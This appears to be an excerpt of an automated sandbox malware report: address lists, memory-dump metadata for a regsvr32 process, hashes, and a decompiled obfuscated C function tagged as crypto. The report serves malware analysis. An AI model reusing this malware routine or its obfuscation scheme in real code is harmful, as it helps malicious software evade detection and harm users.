                                                                                                                0x001bb03e
                                                                                                                0x001bb041
                                                                                                                0x001bb048
                                                                                                                0x001bb053
                                                                                                                0x001bb05e
                                                                                                                0x001bb069
                                                                                                                0x001bb074
                                                                                                                0x001bb08a
                                                                                                                0x001bb091
                                                                                                                0x001bb09c
                                                                                                                0x001bb0a7
                                                                                                                0x001bb0b2
                                                                                                                0x001bb0bd
                                                                                                                0x001bb0c8
                                                                                                                0x001bb0d0
                                                                                                                0x001bb0db
                                                                                                                0x001bb0e6
                                                                                                                0x001bb0f1
                                                                                                                0x001bb0fc
                                                                                                                0x001bb107
                                                                                                                0x001bb10f
                                                                                                                0x001bb11b
                                                                                                                0x001bb11e
                                                                                                                0x001bb122
                                                                                                                0x001bb12a
                                                                                                                0x001bb13d
                                                                                                                0x001bb144
                                                                                                                0x001bb14f
                                                                                                                0x001bb160
                                                                                                                0x001bb163
                                                                                                                0x001bb167
                                                                                                                0x001bb16f
                                                                                                                0x001bb174
                                                                                                                0x001bb17c
                                                                                                                0x001bb184
                                                                                                                0x001bb18c
                                                                                                                0x001bb19c
                                                                                                                0x001bb1a0
                                                                                                                0x001bb1a8
                                                                                                                0x001bb1b5
                                                                                                                0x001bb1b6
                                                                                                                0x001bb1ba
                                                                                                                0x001bb1bf
                                                                                                                0x001bb1c4
                                                                                                                0x001bb1cc
                                                                                                                0x001bb1d7
                                                                                                                0x001bb1e2
                                                                                                                0x001bb1ed
                                                                                                                0x001bb1f5
                                                                                                                0x001bb1fa
                                                                                                                0x001bb202
                                                                                                                0x001bb20a
                                                                                                                0x001bb212
                                                                                                                0x001bb21a
                                                                                                                0x001bb222
                                                                                                                0x001bb22a
                                                                                                                0x001bb232
                                                                                                                0x001bb23d
                                                                                                                0x001bb248
                                                                                                                0x001bb250
                                                                                                                0x001bb25b
                                                                                                                0x001bb266
                                                                                                                0x001bb271
                                                                                                                0x001bb27c
                                                                                                                0x001bb28a
                                                                                                                0x001bb28e
                                                                                                                0x001bb296
                                                                                                                0x001bb29b
                                                                                                                0x001bb2a3
                                                                                                                0x001bb2ae
                                                                                                                0x001bb2b9
                                                                                                                0x001bb2c4
                                                                                                                0x001bb2d7
                                                                                                                0x001bb2de
                                                                                                                0x001bb2e9
                                                                                                                0x001bb2f4
                                                                                                                0x001bb2fc
                                                                                                                0x001bb307
                                                                                                                0x001bb30f
                                                                                                                0x001bb317
                                                                                                                0x001bb31f
                                                                                                                0x001bb327
                                                                                                                0x001bb332
                                                                                                                0x001bb33d
                                                                                                                0x001bb348
                                                                                                                0x001bb353
                                                                                                                0x001bb35e
                                                                                                                0x001bb369
                                                                                                                0x001bb374
                                                                                                                0x001bb37c
                                                                                                                0x001bb384
                                                                                                                0x001bb389
                                                                                                                0x001bb391
                                                                                                                0x001bb39c
                                                                                                                0x001bb3a4
                                                                                                                0x001bb3af
                                                                                                                0x001bb3ba
                                                                                                                0x001bb3c2
                                                                                                                0x001bb3cc
                                                                                                                0x001bb3d4
                                                                                                                0x001bb3dc
                                                                                                                0x001bb3e4
                                                                                                                0x001bb3ef
                                                                                                                0x001bb404
                                                                                                                0x001bb407
                                                                                                                0x001bb40e
                                                                                                                0x001bb419
                                                                                                                0x001bb424
                                                                                                                0x001bb42b
                                                                                                                0x001bb436
                                                                                                                0x001bb441
                                                                                                                0x001bb44c
                                                                                                                0x001bb457
                                                                                                                0x001bb462
                                                                                                                0x001bb46d
                                                                                                                0x001bb478
                                                                                                                0x001bb483
                                                                                                                0x001bb48e
                                                                                                                0x001bb499
                                                                                                                0x001bb4a4
                                                                                                                0x001bb4af
                                                                                                                0x001bb4ba
                                                                                                                0x001bb4c5
                                                                                                                0x001bb4db
                                                                                                                0x001bb4e2
                                                                                                                0x001bb4ed
                                                                                                                0x001bb4f5
                                                                                                                0x001bb4fd
                                                                                                                0x001bb505
                                                                                                                0x001bb50d
                                                                                                                0x001bb515
                                                                                                                0x001bb520
                                                                                                                0x001bb528
                                                                                                                0x001bb533
                                                                                                                0x001bb53e
                                                                                                                0x001bb546
                                                                                                                0x001bb54b
                                                                                                                0x001bb553
                                                                                                                0x001bb55b
                                                                                                                0x001bb566
                                                                                                                0x001bb571
                                                                                                                0x001bb57c
                                                                                                                0x001bb587
                                                                                                                0x001bb592
                                                                                                                0x001bb59d
                                                                                                                0x001bb5a5
                                                                                                                0x001bb5b1
                                                                                                                0x001bb5b6
                                                                                                                0x001bb5bc
                                                                                                                0x001bb5c4
                                                                                                                0x001bb5cc
                                                                                                                0x001bb5de
                                                                                                                0x001bb5e1
                                                                                                                0x001bb5e8
                                                                                                                0x001bb5f3
                                                                                                                0x001bb5fe
                                                                                                                0x001bb606
                                                                                                                0x001bb611
                                                                                                                0x001bb61c
                                                                                                                0x001bb624
                                                                                                                0x001bb62f
                                                                                                                0x001bb63a
                                                                                                                0x001bb645
                                                                                                                0x001bb64d
                                                                                                                0x001bb658
                                                                                                                0x001bb663
                                                                                                                0x001bb670
                                                                                                                0x001bb67b
                                                                                                                0x001bb68f
                                                                                                                0x001bb694
                                                                                                                0x001bb69d
                                                                                                                0x001bb6a8
                                                                                                                0x001bb6b5
                                                                                                                0x001bb6b8
                                                                                                                0x001bb6bc
                                                                                                                0x001bb6c4
                                                                                                                0x001bb6cc
                                                                                                                0x001bb6d4
                                                                                                                0x001bb6dc
                                                                                                                0x001bb6e1
                                                                                                                0x001bb6e9
                                                                                                                0x001bb6f1
                                                                                                                0x001bb6f6
                                                                                                                0x001bb6fb
                                                                                                                0x001bb703
                                                                                                                0x001bb70b
                                                                                                                0x001bb713
                                                                                                                0x001bb71b
                                                                                                                0x001bb723
                                                                                                                0x001bb72b
                                                                                                                0x001bb733
                                                                                                                0x001bb740
                                                                                                                0x001bb74c
                                                                                                                0x001bb750
                                                                                                                0x001bb758
                                                                                                                0x001bb760
                                                                                                                0x001bb768
                                                                                                                0x001bb76d
                                                                                                                0x001bb775
                                                                                                                0x001bb77d
                                                                                                                0x001bb788
                                                                                                                0x001bb798
                                                                                                                0x001bb799
                                                                                                                0x001bb7a0
                                                                                                                0x001bb7ab
                                                                                                                0x001bb7b3
                                                                                                                0x001bb7bb
                                                                                                                0x001bb7c3
                                                                                                                0x001bb7cb
                                                                                                                0x001bb7d6
                                                                                                                0x001bb7e1
                                                                                                                0x001bb7ec
                                                                                                                0x001bb7f4
                                                                                                                0x001bb801
                                                                                                                0x001bb80b
                                                                                                                0x001bb80f
                                                                                                                0x001bb817
                                                                                                                0x001bb82a
                                                                                                                0x001bb831
                                                                                                                0x001bb83c
                                                                                                                0x001bb847
                                                                                                                0x001bb852
                                                                                                                0x001bb85d
                                                                                                                0x001bb870
                                                                                                                0x001bb87f
                                                                                                                0x001bb886
                                                                                                                0x001bb891
                                                                                                                0x001bb89c
                                                                                                                0x001bb8a6
                                                                                                                0x001bb8b1
                                                                                                                0x001bb8b6
                                                                                                                0x001bb8be
                                                                                                                0x001bb8c3
                                                                                                                0x001bb8cb
                                                                                                                0x001bb8d3
                                                                                                                0x001bb8db
                                                                                                                0x001bb8e0
                                                                                                                0x001bb8ee
                                                                                                                0x001bb8f1
                                                                                                                0x001bb8f6
                                                                                                                0x001bb8fa
                                                                                                                0x001bb902
                                                                                                                0x001bb90f
                                                                                                                0x001bb913
                                                                                                                0x001bb918
                                                                                                                0x001bb920
                                                                                                                0x001bb928
                                                                                                                0x001bb933
                                                                                                                0x001bb93b
                                                                                                                0x001bb946
                                                                                                                0x001bb94e
                                                                                                                0x001bb956
                                                                                                                0x001bb95b
                                                                                                                0x001bb963
                                                                                                                0x001bb96b
                                                                                                                0x001bb970
                                                                                                                0x001bb978
                                                                                                                0x001bb97d
                                                                                                                0x001bb985
                                                                                                                0x001bb985
                                                                                                                0x001bb98a
                                                                                                                0x001bb98a
                                                                                                                0x001bb98f
                                                                                                                0x001bb98f
                                                                                                                0x001bb98f
                                                                                                                0x001bb98f
                                                                                                                0x001bb991
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001bbbc8
                                                                                                                0x001bbbca
                                                                                                                0x001bbcf0
                                                                                                                0x001bbcf9
                                                                                                                0x001bbcfe
                                                                                                                0x001bbd01
                                                                                                                0x001bbd08
                                                                                                                0x001bbd0a
                                                                                                                0x001bbd16
                                                                                                                0x00000000
                                                                                                                0x001bbd0c
                                                                                                                0x001bbd0c
                                                                                                                0x00000000
                                                                                                                0x001bbd0c
                                                                                                                0x001bbbd0
                                                                                                                0x001bbbd0
                                                                                                                0x001bbbd6
                                                                                                                0x001bbcca
                                                                                                                0x00000000
                                                                                                                0x001bbbdc
                                                                                                                0x001bbbdc
                                                                                                                0x001bbbe2
                                                                                                                0x001bbc22
                                                                                                                0x001bbc29
                                                                                                                0x001bbc2e
                                                                                                                0x001bbc88
                                                                                                                0x001bbc8d
                                                                                                                0x001bbc9b
                                                                                                                0x001bbcab
                                                                                                                0x001bbcc0
                                                                                                                0x001bbb4c
                                                                                                                0x001bbb4c
                                                                                                                0x001bbb4f
                                                                                                                0x001bbd18
                                                                                                                0x001bbd18
                                                                                                                0x001bbd1c
                                                                                                                0x001bbd21
                                                                                                                0x00000000
                                                                                                                0x001bbbe4
                                                                                                                0x001bbbe4
                                                                                                                0x001bbbea
                                                                                                                0x00000000
                                                                                                                0x001bbbf0
                                                                                                                0x001bbc10
                                                                                                                0x001bbc15
                                                                                                                0x001bbc18
                                                                                                                0x001bb9e0
                                                                                                                0x001bb9e0
                                                                                                                0x00000000
                                                                                                                0x001bb9e0
                                                                                                                0x001bbbea
                                                                                                                0x001bbbe2
                                                                                                                0x001bbbd6
                                                                                                                0x001bbd58
                                                                                                                0x001bbd62
                                                                                                                0x001bbd62
                                                                                                                0x001bb997
                                                                                                                0x001bbd4e
                                                                                                                0x001bb99d
                                                                                                                0x001bb9a3
                                                                                                                0x001bbb59
                                                                                                                0x001bbb9f
                                                                                                                0x001bbba6
                                                                                                                0x001bbbb5
                                                                                                                0x001bbbb7
                                                                                                                0x001bbbbb
                                                                                                                0x001bbbc0
                                                                                                                0x001bb98a
                                                                                                                0x00000000
                                                                                                                0x001bb9a9
                                                                                                                0x001bb9af
                                                                                                                0x001bba78
                                                                                                                0x001bba7c
                                                                                                                0x001bba81
                                                                                                                0x001bba90
                                                                                                                0x001bba9a
                                                                                                                0x001bbaa1
                                                                                                                0x001bbaa6
                                                                                                                0x001bbafa
                                                                                                                0x001bbb11
                                                                                                                0x001bbb22
                                                                                                                0x001bbb27
                                                                                                                0x001bbb42
                                                                                                                0x001bbb47
                                                                                                                0x00000000
                                                                                                                0x001bb9b5
                                                                                                                0x001bb9b7
                                                                                                                0x001bba55
                                                                                                                0x001bba66
                                                                                                                0x001bba69
                                                                                                                0x001bba6e
                                                                                                                0x001bba70
                                                                                                                0x00000000
                                                                                                                0x001bb9b9
                                                                                                                0x001bb9bb
                                                                                                                0x001bba11
                                                                                                                0x001bba18
                                                                                                                0x001bba27
                                                                                                                0x001bba29
                                                                                                                0x00000000
                                                                                                                0x001bb9bd
                                                                                                                0x001bb9c3
                                                                                                                0x00000000
                                                                                                                0x001bb9c9
                                                                                                                0x001bb9d8
                                                                                                                0x001bb9de
                                                                                                                0x00000000
                                                                                                                0x001bb9de
                                                                                                                0x001bb9c3
                                                                                                                0x001bb9bb
                                                                                                                0x001bb9b7
                                                                                                                0x001bb9af
                                                                                                                0x001bb9a3
                                                                                                                0x00000000
                                                                                                                0x001bbd26
                                                                                                                0x001bbd26
                                                                                                                0x001bbd26
                                                                                                                0x00000000
                                                                                                                0x001bbd32
                                                                                                                0x001bb98a

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &$)U|$+u$4Mk$4Ur$?$Q;$i?r$y[A
                                                                                                                • API String ID: 0-3461261877
                                                                                                                • Opcode ID: e166ce53f26dfd8eb4a1b03722217f6ff9cc660b9fc7f1277785e6b0eca02262
                                                                                                                • Instruction ID: 05d35bb34e371bd02d774c1e56a85a2ded2ddef7ee8bd0d9bf169370aaec6796
                                                                                                                • Opcode Fuzzy Hash: e166ce53f26dfd8eb4a1b03722217f6ff9cc660b9fc7f1277785e6b0eca02262
                                                                                                                • Instruction Fuzzy Hash: 826200715093819BD378CF65C98AB9BBBE1FBC4308F10891DE2DA96260D7B18949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B1B29 Relevance: 11.7, Strings: 9, Instructions: 415COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001B1B29(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v36;
				intOrPtr _v44;
				intOrPtr _v76;
				char* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				unsigned int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				unsigned int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				unsigned int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				void* _t389;
				intOrPtr _t429;
				signed int _t433;
				void* _t442;
				void* _t449;
				void* _t457;
				intOrPtr* _t459;
				void* _t461;
				signed char* _t473;
				signed char* _t511;
				intOrPtr* _t512;
				intOrPtr _t513;
				intOrPtr _t515;
				void* _t516;
				signed char* _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				intOrPtr _t529;
				signed int* _t531;
				signed int* _t532;
				void* _t534;

				_t512 = _a16;
				_t459 = __ecx;
				_push(_t512);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t389);
				_v104 = _v104 & 0x00000000;
				_t531 =  &(( &_v284)[6]);
				_v112 = 0x664852;
				_v108 = 0x764e71;
				_t513 = 0;
				_v216 = 0x4f6549;
				_t461 = 0x20b9346;
				_v216 = _v216 >> 1;
				_v216 = _v216 + 0xffff9437;
				_v216 = _v216 ^ 0x002746db;
				_v196 = 0xdd0e12;
				_v196 = _v196 >> 6;
				_v196 = _v196 + 0xffff6c8c;
				_v196 = _v196 ^ 0x0002e084;
				_v180 = 0x98bbd0;
				_t518 = 0x57;
				_v180 = _v180 / _t518;
				_t519 = 0x51;
				_v180 = _v180 / _t519;
				_v180 = _v180 ^ 0x000005cc;
				_v144 = 0x85ed12;
				_v144 = _v144 ^ 0xf75a6943;
				_v144 = _v144 ^ 0xf7d0674e;
				_v260 = 0xad0f44;
				_v260 = _v260 | 0x104cdc68;
				_v260 = _v260 + 0xed83;
				_v260 = _v260 + 0xffffc029;
				_v260 = _v260 ^ 0x10e31ea2;
				_v276 = 0xc7b594;
				_v276 = _v276 | 0x878ae8e1;
				_v276 = _v276 ^ 0xd8f988dc;
				_t520 = 0x2a;
				_v132 = 0;
				_v276 = _v276 / _t520;
				_v276 = _v276 ^ 0x02494d5a;
				_v252 = 0x88c97a;
				_v252 = _v252 << 0xe;
				_v252 = _v252 + 0x1264;
				_v252 = _v252 | 0xbb34708f;
				_v252 = _v252 ^ 0xbb719559;
				_v164 = 0x4147af;
				_v164 = _v164 + 0xffff1859;
				_v164 = _v164 ^ 0x004aa0da;
				_v172 = 0xc12e3c;
				_v172 = _v172 ^ 0xfb0365cf;
				_v172 = _v172 ^ 0xfbc0c8a9;
				_v236 = 0x3d8e78;
				_v236 = _v236 << 2;
				_v236 = _v236 + 0xffff2a6b;
				_v236 = _v236 ^ 0x00f18efb;
				_v224 = 0x3a6891;
				_v224 = _v224 + 0xffff9448;
				_v224 = _v224 ^ 0x2f40b269;
				_v224 = _v224 ^ 0x2f735a44;
				_v160 = 0x331e0;
				_v160 = _v160 * 0x43;
				_v160 = _v160 ^ 0x00d51405;
				_v168 = 0x9626f3;
				_v168 = _v168 + 0xffffc9f3;
				_v168 = _v168 ^ 0x009dd9d5;
				_v188 = 0xd0cf83;
				_v188 = _v188 + 0xffff21c9;
				_v188 = _v188 >> 5;
				_v188 = _v188 ^ 0x0003b221;
				_v156 = 0x2f0f97;
				_v156 = _v156 >> 0xd;
				_v156 = _v156 ^ 0x00090060;
				_v228 = 0x329c72;
				_t521 = 0x6b;
				_v228 = _v228 * 0x4b;
				_v228 = _v228 >> 8;
				_v228 = _v228 ^ 0x000fa717;
				_v184 = 0xde2a7b;
				_v184 = _v184 << 0x10;
				_v184 = _v184 / _t521;
				_v184 = _v184 ^ 0x0068278f;
				_v192 = 0x40c987;
				_v192 = _v192 * 0x4e;
				_v192 = _v192 + 0x17c1;
				_v192 = _v192 ^ 0x13b16fae;
				_v256 = 0xc3f59b;
				_v256 = _v256 >> 2;
				_v256 = _v256 >> 0xf;
				_v256 = _v256 + 0xffff9c39;
				_v256 = _v256 ^ 0xfffe80b9;
				_v264 = 0x6ae9d2;
				_v264 = _v264 * 0x65;
				_v264 = _v264 / _t521;
				_t522 = 0xe;
				_v264 = _v264 * 0x65;
				_v264 = _v264 ^ 0x27d78059;
				_v280 = 0x28e312;
				_v280 = _v280 | 0xac9038e9;
				_v280 = _v280 / _t522;
				_v280 = _v280 << 2;
				_v280 = _v280 ^ 0x31555bc5;
				_v212 = 0xe93993;
				_t523 = 0x19;
				_v212 = _v212 / _t523;
				_v212 = _v212 << 2;
				_v212 = _v212 ^ 0x002a1c87;
				_v284 = 0x7db97e;
				_v284 = _v284 + 0xffff53d8;
				_v284 = _v284 | 0x36a49b8c;
				_v284 = _v284 * 0x5e;
				_v284 = _v284 ^ 0x312e7f49;
				_v272 = 0x6084e8;
				_v272 = _v272 + 0xffffe488;
				_v272 = _v272 << 0xd;
				_v272 = _v272 ^ 0x4662a03b;
				_v272 = _v272 ^ 0x4b43d01f;
				_v148 = 0x59dc25;
				_v148 = _v148 | 0xa2da7dc3;
				_v148 = _v148 ^ 0xa2d7e9fb;
				_v204 = 0x2b31fd;
				_v204 = _v204 << 2;
				_v204 = _v204 ^ 0x28e6122b;
				_v204 = _v204 ^ 0x2840e346;
				_v244 = 0x520076;
				_v244 = _v244 << 0xb;
				_t524 = 0x46;
				_v244 = _v244 / _t524;
				_v244 = _v244 ^ 0x020519aa;
				_v232 = 0xe22854;
				_t234 =  &_v232; // 0xe22854
				_t525 = 0x32;
				_v232 =  *_t234 / _t525;
				_v232 = _v232 + 0xffffec63;
				_v232 = _v232 ^ 0x00009bdd;
				_v140 = 0x1ef899;
				_t526 = 0x13;
				_v140 = _v140 * 0x7a;
				_v140 = _v140 ^ 0x0ec1433e;
				_v200 = 0x1538f1;
				_v200 = _v200 ^ 0xfc54e9f1;
				_v200 = _v200 / _t526;
				_v200 = _v200 ^ 0x0d4c9d99;
				_v208 = 0xdc7bed;
				_v208 = _v208 | 0x4fe6e542;
				_v208 = _v208 ^ 0x446d9a8c;
				_v208 = _v208 ^ 0x0b950994;
				_v152 = 0x5b0852;
				_t527 = 5;
				_v152 = _v152 / _t527;
				_v152 = _v152 ^ 0x00151803;
				_v176 = 0x1de77c;
				_t528 = 0xa;
				_v176 = _v176 * 0x50;
				_t529 = _v132;
				_v176 = _v176 / _t528;
				_v176 = _v176 ^ 0x00e7f0f2;
				_v268 = 0x2b2bd;
				_v268 = _v268 + 0x209d;
				_v268 = _v268 * 0x51;
				_v268 = _v268 | 0xc2bcfc7e;
				_v268 = _v268 ^ 0xc2f79e81;
				_v240 = 0x1916a2;
				_v240 = _v240 ^ 0x1b8638be;
				_v240 = _v240 ^ 0x09b473f3;
				_v240 = _v240 ^ 0x122bfb1c;
				_v248 = 0xaef597;
				_v248 = _v248 * 0x31;
				_v248 = _v248 << 6;
				_v248 = _v248 + 0xcba5;
				_v248 = _v248 ^ 0x5f4126c9;
				_v136 = 0x6e7e01;
				_v136 = _v136 ^ 0xa8e44615;
				_v136 = _v136 ^ 0xa88a3804;
				_v220 = 0x5b02be;
				_v220 = _v220 + 0xe988;
				_v220 = _v220 ^ 0xe5e6b7ff;
				_v220 = _v220 ^ 0xe5bd5b39;
				goto L1;
				do {
					while(1) {
						L1:
						_t534 = _t461 - 0x6a2e165;
						if(_t534 > 0) {
							break;
						}
						if(_t534 == 0) {
							_push(_v220);
							_t529 = E001B96D4(_t461, _v136);
							_t531 =  &(_t531[3]);
							_t461 = 0x8028098;
							 *((intOrPtr*)(_t459 + 4)) = _v196 + _v124 + _t529;
							continue;
						} else {
							if(_t461 == 0x1967615) {
								E001B17D2(_v176, _v268, _v128);
								_t461 = 0xa6f1a29;
								continue;
							} else {
								if(_t461 == 0x1c212ef) {
									_push(_t461);
									_t442 = E001BAF0B( &_v36, _v144, _v260, _v276,  *_t512,  *((intOrPtr*)(_t512 + 4)), _v252);
									_t531 =  &(_t531[6]);
									if(_t442 != 0) {
										_t461 = 0x2cf5daf;
										continue;
									}
								} else {
									if(_t461 == 0x20b9346) {
										_t461 = 0x1c212ef;
										continue;
									} else {
										if(_t461 != 0x2cf5daf) {
											goto L27;
										} else {
											_v44 = _a8;
											_v80 =  &_v36;
											_v88 =  *_t512;
											_v84 =  *((intOrPtr*)(_t512 + 4));
											_v76 = 0x20;
											_t449 = E001B7730(_v172,  &_v120, _v236,  &_v100, _v224);
											_t531 =  &(_t531[4]);
											if(_t449 != 0) {
												_t461 = 0xa83b70f;
												continue;
											}
										}
									}
								}
							}
						}
						L30:
						return _t513;
					}
					if(_t461 == 0x8028098) {
						_push(_t461);
						_t429 = E001A303A(_t461,  *((intOrPtr*)(_t459 + 4)));
						_t531 =  &(_t531[3]);
						 *_t459 = _t429;
						if(_t429 == 0) {
							_t461 = 0x1967615;
							goto L27;
						} else {
							_t461 = 0xbbe0ddd;
							_t513 = 1;
							_v132 = 1;
							goto L1;
						}
					} else {
						if(_t461 == 0xa6f1a29) {
							E001B17D2(_v240, _v248, _v120);
						} else {
							if(_t461 == 0xa83b70f) {
								_t433 = E001B490E( &_v128, _v168,  &_v120);
								asm("sbb ecx, ecx");
								_t461 = ( ~_t433 & 0xfc33c73c) + 0xa6f1a29;
								goto L1;
							} else {
								if(_t461 != 0xbbe0ddd) {
									goto L27;
								} else {
									_t515 =  *_t459;
									E001B6845(_v280, _t515, _v212, _v284);
									_t516 = _t515 + _v180;
									E001BFD42(_v124, _v272, _v128, _v148, _t516, _v204);
									_t517 = _t516 + _v124;
									_push(_t517);
									_t366 =  &_v140; // 0x664852
									_push( *_t366);
									_push(_v232);
									E001A2F36(_v244, _t529);
									_t511 =  &(_t517[_t529]);
									_t532 =  &(_t531[9]);
									_t473 = _t517;
									if(_t517 < _t511) {
										do {
											if(( *_t473 & 0x000000ff) == _v216) {
												 *_t473 = 0xc3;
											}
											_t473 =  &(_t473[1]);
										} while (_t473 < _t511);
									}
									_push(0xe);
									_t457 = E001B96D4(_t473, 0);
									_t531 =  &(_t532[3]);
									_t461 = 0x1967615;
									 *((char*)(_t457 + _t517)) = 0;
									_t513 = _v132;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L27:
				} while (_t461 != 0xe2411a0);
				goto L30;
			}





















































































                                                                                                                0x001b1b33
                                                                                                                0x001b1b3a
                                                                                                                0x001b1b3c
                                                                                                                0x001b1b3d
                                                                                                                0x001b1b44
                                                                                                                0x001b1b4b
                                                                                                                0x001b1b52
                                                                                                                0x001b1b53
                                                                                                                0x001b1b54
                                                                                                                0x001b1b59
                                                                                                                0x001b1b61
                                                                                                                0x001b1b64
                                                                                                                0x001b1b71
                                                                                                                0x001b1b7c
                                                                                                                0x001b1b7e
                                                                                                                0x001b1b86
                                                                                                                0x001b1b8b
                                                                                                                0x001b1b8f
                                                                                                                0x001b1b97
                                                                                                                0x001b1b9f
                                                                                                                0x001b1ba7
                                                                                                                0x001b1bac
                                                                                                                0x001b1bb4
                                                                                                                0x001b1bbc
                                                                                                                0x001b1bca
                                                                                                                0x001b1bcf
                                                                                                                0x001b1bd9
                                                                                                                0x001b1bde
                                                                                                                0x001b1be4
                                                                                                                0x001b1bec
                                                                                                                0x001b1bf7
                                                                                                                0x001b1c02
                                                                                                                0x001b1c0d
                                                                                                                0x001b1c15
                                                                                                                0x001b1c1d
                                                                                                                0x001b1c25
                                                                                                                0x001b1c2d
                                                                                                                0x001b1c35
                                                                                                                0x001b1c3d
                                                                                                                0x001b1c45
                                                                                                                0x001b1c51
                                                                                                                0x001b1c54
                                                                                                                0x001b1c5b
                                                                                                                0x001b1c5f
                                                                                                                0x001b1c67
                                                                                                                0x001b1c6f
                                                                                                                0x001b1c74
                                                                                                                0x001b1c7c
                                                                                                                0x001b1c84
                                                                                                                0x001b1c8c
                                                                                                                0x001b1c97
                                                                                                                0x001b1ca2
                                                                                                                0x001b1cad
                                                                                                                0x001b1cb8
                                                                                                                0x001b1cc3
                                                                                                                0x001b1cce
                                                                                                                0x001b1cd6
                                                                                                                0x001b1cdb
                                                                                                                0x001b1ce3
                                                                                                                0x001b1ceb
                                                                                                                0x001b1cf3
                                                                                                                0x001b1cfb
                                                                                                                0x001b1d03
                                                                                                                0x001b1d0b
                                                                                                                0x001b1d1e
                                                                                                                0x001b1d27
                                                                                                                0x001b1d32
                                                                                                                0x001b1d3d
                                                                                                                0x001b1d48
                                                                                                                0x001b1d53
                                                                                                                0x001b1d5b
                                                                                                                0x001b1d63
                                                                                                                0x001b1d68
                                                                                                                0x001b1d70
                                                                                                                0x001b1d7b
                                                                                                                0x001b1d83
                                                                                                                0x001b1d8e
                                                                                                                0x001b1d9d
                                                                                                                0x001b1da0
                                                                                                                0x001b1da4
                                                                                                                0x001b1da9
                                                                                                                0x001b1db1
                                                                                                                0x001b1db9
                                                                                                                0x001b1dc6
                                                                                                                0x001b1dca
                                                                                                                0x001b1dd2
                                                                                                                0x001b1ddf
                                                                                                                0x001b1de3
                                                                                                                0x001b1deb
                                                                                                                0x001b1df3
                                                                                                                0x001b1dfb
                                                                                                                0x001b1e00
                                                                                                                0x001b1e05
                                                                                                                0x001b1e0d
                                                                                                                0x001b1e15
                                                                                                                0x001b1e22
                                                                                                                0x001b1e2e
                                                                                                                0x001b1e37
                                                                                                                0x001b1e3a
                                                                                                                0x001b1e3e
                                                                                                                0x001b1e46
                                                                                                                0x001b1e4e
                                                                                                                0x001b1e5e
                                                                                                                0x001b1e62
                                                                                                                0x001b1e67
                                                                                                                0x001b1e6f
                                                                                                                0x001b1e7b
                                                                                                                0x001b1e7e
                                                                                                                0x001b1e82
                                                                                                                0x001b1e87
                                                                                                                0x001b1e8f
                                                                                                                0x001b1e97
                                                                                                                0x001b1e9f
                                                                                                                0x001b1eac
                                                                                                                0x001b1eb0
                                                                                                                0x001b1eb8
                                                                                                                0x001b1ec0
                                                                                                                0x001b1ec8
                                                                                                                0x001b1ecd
                                                                                                                0x001b1ed5
                                                                                                                0x001b1edd
                                                                                                                0x001b1ee8
                                                                                                                0x001b1ef3
                                                                                                                0x001b1efe
                                                                                                                0x001b1f06
                                                                                                                0x001b1f0b
                                                                                                                0x001b1f15
                                                                                                                0x001b1f1d
                                                                                                                0x001b1f25
                                                                                                                0x001b1f30
                                                                                                                0x001b1f35
                                                                                                                0x001b1f3b
                                                                                                                0x001b1f43
                                                                                                                0x001b1f4b
                                                                                                                0x001b1f4f
                                                                                                                0x001b1f54
                                                                                                                0x001b1f5a
                                                                                                                0x001b1f62
                                                                                                                0x001b1f6a
                                                                                                                0x001b1f7d
                                                                                                                0x001b1f80
                                                                                                                0x001b1f87
                                                                                                                0x001b1f92
                                                                                                                0x001b1f9a
                                                                                                                0x001b1faa
                                                                                                                0x001b1fae
                                                                                                                0x001b1fb6
                                                                                                                0x001b1fbe
                                                                                                                0x001b1fc6
                                                                                                                0x001b1fce
                                                                                                                0x001b1fd6
                                                                                                                0x001b1fe8
                                                                                                                0x001b1fed
                                                                                                                0x001b1ff6
                                                                                                                0x001b2001
                                                                                                                0x001b2014
                                                                                                                0x001b2015
                                                                                                                0x001b201f
                                                                                                                0x001b2026
                                                                                                                0x001b202a
                                                                                                                0x001b2032
                                                                                                                0x001b203a
                                                                                                                0x001b2047
                                                                                                                0x001b204b
                                                                                                                0x001b2053
                                                                                                                0x001b205b
                                                                                                                0x001b2063
                                                                                                                0x001b206b
                                                                                                                0x001b2073
                                                                                                                0x001b207b
                                                                                                                0x001b2088
                                                                                                                0x001b208c
                                                                                                                0x001b2091
                                                                                                                0x001b2099
                                                                                                                0x001b20a1
                                                                                                                0x001b20ac
                                                                                                                0x001b20b7
                                                                                                                0x001b20c2
                                                                                                                0x001b20ca
                                                                                                                0x001b20d2
                                                                                                                0x001b20da
